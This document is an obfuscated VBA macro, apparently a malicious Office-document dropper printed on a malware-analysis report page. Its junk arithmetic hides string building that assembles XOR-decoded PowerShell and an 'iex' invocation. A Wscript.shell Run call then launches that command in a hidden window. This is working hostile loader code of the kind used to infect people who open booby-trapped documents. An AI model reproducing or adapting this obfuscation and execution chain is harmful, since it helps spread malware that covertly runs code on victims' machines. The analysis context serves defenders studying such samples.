MKMowDfbmVO = " , 7" + ",65 , 95 " + ", 93 ,72 " + ", 95 ,8" + "4, 71 ," + " 65,6" + "5" + Chr(41) + " | forE" + "AcH{ [Cha" + "R]" + Chr(40) + " " + "$_ -"
CTssdf = (MGANq + EJfirM / qKMLpK / 73193 - (HjkjAa + XjCDc * Wzzqz * VubACC + usGhCT + iFZPjq))
   MNVGFN = (SiwLT + HVHrla / iJZCj / 1520 - (dZTNZ + KOddM * NQivjL * rbuhHW + FzDoTa + GjtPj))
   zfiOu = (OYJQAl + cAzTPr / KUVjO / 65461 - (itcTk + HLXBKj * jGUCoh * HXLbB + UrcKuA + fkijz))
   GlRdz = (fKbEA + uhaDH / BRsLQi / 24636 - (KXBzb + FZaVpu * SVhsm * rzSlbd + ifWuUi + pwIIc))
ATFWV = "bXor  0" + "x3c  " + Chr(41) + "}" + Chr(41) + "|&" + Chr(40) + Chr(40) + "vaR" + "iABle '*M" + "dR*'" + Chr(41) + ".NaME[3," + "11,2]-j" + "oiN''" + Chr(41) + "  "
IOkqAzDLGFw = qLiRaXi + fmofBMsr + MKMowDfbmVO + ATFWV
   jNPTf = (oQmhGn + VBVrAZ / WwrXk / 44387 - (UhYMX + qMdVDY * tISGlG * PTpqi + wjlVsi + ZTjNU))
   jzPoM = (DMTwmP + znsfwF / dJtcw / 34556 - (SrHOEz + vDfPfa * otHupi * wqlWDX + ZFnsuD + ULiiRz))
   flwfn = (aUKPUr + Qjffid / ffRBA / 69865 - (lQahJH + qIiVO * SZirM * mcwZt + CikzUu + DBoDkh))
   jTaXB = (ULpFz + pozGn / jAGZcq / 77120 - (pKRiWw + AcSCb * jNrti * vErFu + MEhEK + kjQUJu))
End Function


Attribute VB_Name = "ofuEXASI"
Function EYXBvZofK(zqEUUQiHoE)
On Error Resume Next
   AALRMQ = ZCSZE - vbKNOi / 54471 * 28314 / 67883 / LHaFwm / smdhbc - MdBVY
   Ajjnzc = mDdNf - LAKmL / 43286 * 73947 / 23979 / mbJUz / BkdHqA - cXmGTY
   kwsoIE = MiPIbp - RWJKM / 87351 * 87704 / 77923 / skvYN / TzWTvf - aLzkmK
   pIQBK = MCrpw - WbzIii / 57274 * 31239 / 72660 / zGpQX / mzFDN - kdKHK
   WqdNEr = UAvRo - iADNjR / 41749 * 22192 / 35311 / Htdivz / bGjvt - GhTVd
   wbCHjF = HkEVoh - EVTbN / 35316 * 44027 / 76322 / KFAow / fNwsMV - FmtYV
   VohkM = NlLHs - YjMzsG / 8808 * 39506 / 62015 / SNvwL / qvSbz - VkOkVp
   cXluNp = kNrHKb - HsBiQ / 54517 * 19345 / 8617 / ZwUitQ / hpzjKv - LnwAM
nUOXansrijX = iiuqZRcz + CreateObject("Wscript.shell").Run(cuBiz + Chr(vbKeyP) + QDGOIEzQGIl + Chr(vbKeyO) + zqEUUQiHoE + rIbwszZlqGa, 819035469 - 819035469)
   wWhEA = PMNurv - lLWUpO / 84586 * 89025 / 90034 / pQilK / jIlPRk - lJuLwG
   AafFAK = uuHzI - GrnRA / 8372 * 71792 / 58353 / GjaBXl / uDvoS - PldlA
   oSsCTT = wlwnN - ENaQoz / 80611 * 35496 / 37949 / vozIpq / Nfwjvh - wBPpf
   oNdSJ = jtWcKs - wOTzi / 97151 * 74949 / 53612 / zDBUjq / CoPEXp - cORTq
End Function

Open this report in the interactive analyzer, or submit your own file for analysis.